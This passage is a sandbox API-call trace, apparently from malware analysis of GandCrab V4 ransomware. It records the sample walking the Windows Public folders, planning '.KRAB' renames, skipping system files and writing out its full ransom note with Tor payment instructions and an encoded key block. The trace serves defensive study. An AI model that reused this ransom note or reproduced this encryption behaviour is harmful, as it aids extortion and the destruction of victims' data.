GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.065] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Desktop\\d2ca4a08d2ca4dee3d.lock") returned 47 [0101.065] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\desktop\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0101.067] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.067] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.067] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\") returned 24 [0101.067] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Desktop\\*") returned="C:\\Users\\Public\\Desktop\\*" [0101.067] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbe0a0 [0101.068] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0101.068] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.068] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0101.068] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0101.068] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.068] lstrcmpW (lpString1="Acrobat Reader DC.lnk", lpString2=".") returned 1 [0101.068] lstrcmpW (lpString1="Acrobat Reader DC.lnk", lpString2="..") returned 1 [0101.068] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="Acrobat Reader DC.lnk" | out: lpString1="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk") returned="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk" [0101.068] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.068] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk.KRAB") returned 50 [0101.068] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Acrobat Reader DC.lnk") returned 45 [0101.068] lstrlenW (lpString=".lnk") returned 4 [0101.068] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.069] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lnk ") returned 5 [0101.069] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.069] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.069] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.069] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0101.069] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0101.069] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Public\\Desktop\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Public\\Desktop\\d2ca4a08d2ca4dee3d.lock" [0101.070] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.070] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Desktop\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 52 [0101.070] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\d2ca4a08d2ca4dee3d.lock") returned 47 [0101.070] lstrlenW (lpString=".lock") returned 5 [0101.070] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.070] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0101.070] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.071] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.071] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.071] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0101.071] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0101.071] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Desktop\\desktop.ini") returned="C:\\Users\\Public\\Desktop\\desktop.ini" [0101.071] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.071] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Desktop\\desktop.ini.KRAB") returned 40 [0101.071] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\desktop.ini") returned 35 [0101.072] lstrlenW (lpString=".ini") returned 4 [0101.072] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.072] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0101.072] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.072] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\desktop.ini") returned 35 [0101.072] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\desktop.ini") returned 35 [0101.072] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0101.072] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.073] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.073] lstrcmpW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0101.073] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0101.073] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="Google Chrome.lnk" | out: lpString1="C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" [0101.073] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.073] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Desktop\\Google Chrome.lnk.KRAB") returned 46 [0101.073] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 41 [0101.073] lstrlenW (lpString=".lnk") returned 4 [0101.073] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.074] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lnk ") returned 5 [0101.074] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.074] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.075] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.075] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0101.075] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0101.075] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Desktop\\KRAB-DECRYPT.txt") returned="C:\\Users\\Public\\Desktop\\KRAB-DECRYPT.txt" [0101.075] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.075] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Desktop\\KRAB-DECRYPT.txt.KRAB") returned 45 [0101.075] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\KRAB-DECRYPT.txt") returned 40 [0101.076] lstrlenW (lpString=".txt") returned 4 [0101.076] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.076] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0101.076] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.076] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\KRAB-DECRYPT.txt") returned 40 [0101.076] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\KRAB-DECRYPT.txt") returned 40 [0101.076] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0101.077] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0101.077] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0101.077] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0101.077] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0101.079] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0101.079] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0101.079] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0101.079] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0101.079] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0101.079] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.079] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.079] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2=".") returned 1 [0101.079] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2="..") returned 1 [0101.079] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="Mozilla Firefox.lnk" | out: lpString1="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" [0101.079] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.080] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.KRAB") returned 48 [0101.080] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 43 [0101.080] lstrlenW (lpString=".lnk") returned 4 [0101.080] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.080] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lnk ") returned 5 [0101.080] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.081] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.081] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0101.081] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0101.081] CloseHandle (hObject=0x320) returned 1 [0101.082] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.082] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0101.082] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0101.083] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\desktop.ini") returned="C:\\Users\\Public\\desktop.ini" [0101.083] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.083] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\desktop.ini.KRAB") returned 32 [0101.083] lstrlenW (lpString="C:\\Users\\Public\\desktop.ini") returned 27 [0101.083] lstrlenW (lpString=".ini") returned 4 [0101.083] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.083] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0101.084] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.084] lstrlenW (lpString="C:\\Users\\Public\\desktop.ini") returned 27 [0101.084] lstrlenW (lpString="C:\\Users\\Public\\desktop.ini") returned 27 [0101.084] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0101.084] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.084] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.084] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0101.084] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0101.084] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0101.084] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0101.084] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.085] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.085] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.085] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.085] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.085] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.085] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.086] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Documents\\\\KRAB-DECRYPT.txt") returned 43 [0101.086] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\public\\documents\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0101.102] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0101.102] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0101.104] CloseHandle (hObject=0x320) returned 1 [0101.104] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.104] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.105] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x136)) [0101.105] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.105] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.105] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.106] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Documents\\d2ca4a08d2ca4dee3d.lock") returned 49 [0101.106] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\documents\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0101.106] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.107] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.107] lstrlenW (lpString="C:\\Users\\Public\\Documents\\") returned 26 [0101.107] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\*") returned="C:\\Users\\Public\\Documents\\*" [0101.107] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdae0 [0101.107] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0101.107] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.107] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0101.107] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0101.107] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.107] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0101.107] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0101.107] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Public\\Documents\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Public\\Documents\\d2ca4a08d2ca4dee3d.lock" [0101.108] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.108] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Documents\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 54 [0101.108] lstrlenW (lpString="C:\\Users\\Public\\Documents\\d2ca4a08d2ca4dee3d.lock") returned 49 [0101.108] lstrlenW (lpString=".lock") returned 5 [0101.108] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.108] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0101.108] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.109] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.109] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.109] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0101.109] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0101.109] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Documents\\desktop.ini") returned="C:\\Users\\Public\\Documents\\desktop.ini" [0101.109] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.109] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Documents\\desktop.ini.KRAB") returned 42 [0101.109] lstrlenW (lpString="C:\\Users\\Public\\Documents\\desktop.ini") returned 37 [0101.109] lstrlenW (lpString=".ini") returned 4 [0101.109] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.110] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0101.110] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.110] lstrlenW (lpString="C:\\Users\\Public\\Documents\\desktop.ini") returned 37 [0101.110] lstrlenW (lpString="C:\\Users\\Public\\Documents\\desktop.ini") returned 37 [0101.110] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0101.110] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.110] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.110] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0101.110] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0101.110] 